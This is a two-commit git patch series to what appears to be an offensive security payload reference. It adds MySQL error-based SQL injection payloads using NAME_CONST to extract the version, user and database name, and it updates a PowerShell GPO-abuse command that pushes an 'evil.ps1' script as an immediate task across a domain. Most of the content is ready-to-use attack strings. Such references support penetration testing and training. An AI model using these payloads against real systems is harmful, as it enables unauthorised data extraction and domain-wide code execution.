From a568270b15e3676ef9189d45cc7617df645508d0 Mon Sep 17 00:00:00 2001 From: Alex G <24873615+Zeecka@users.noreply.github.com> Date: Thu, 16 Dec 2021 12:11:25 +0100 Subject: [PATCH 1/2] Add NAME_CONST for MySQL Error based injection --- SQL Injection/MySQL Injection.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 1764a132..7edb7e20 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -220,6 +220,16 @@ Works with `MySQL >= 5.1` ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` +### MYSQL Error Based - NAME_CONST function (only for constants) + +Works with `MySQL >= 5.0` + +```sql +?id=1 AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)-- +?id=1 AND (SELECT * FROM (SELECT NAME_CONST(user(),1),NAME_CONST(user(),1)) as x)-- +?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)-- +``` + ## MYSQL Blind ### MYSQL Blind with substring equivalent From a430cfcc4ea0a43ed07f3e8fe2af01cfab63ca96 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 22 Dec 2021 16:09:07 +0100 Subject: [PATCH 2/2] update PowerGPOAbuse task command --- Methodology and Resources/Active Directory Attack.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c9644aa3..493a36e8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1021,7 +1021,7 @@ PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' # Create an immediate task -PS> Add-UserTask/Add-ComputerTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator +PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO' ``` #### Abuse GPO with pyGPOAbuse @@ -3347,4 +3347,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) -* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) \ No newline at end of file +* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)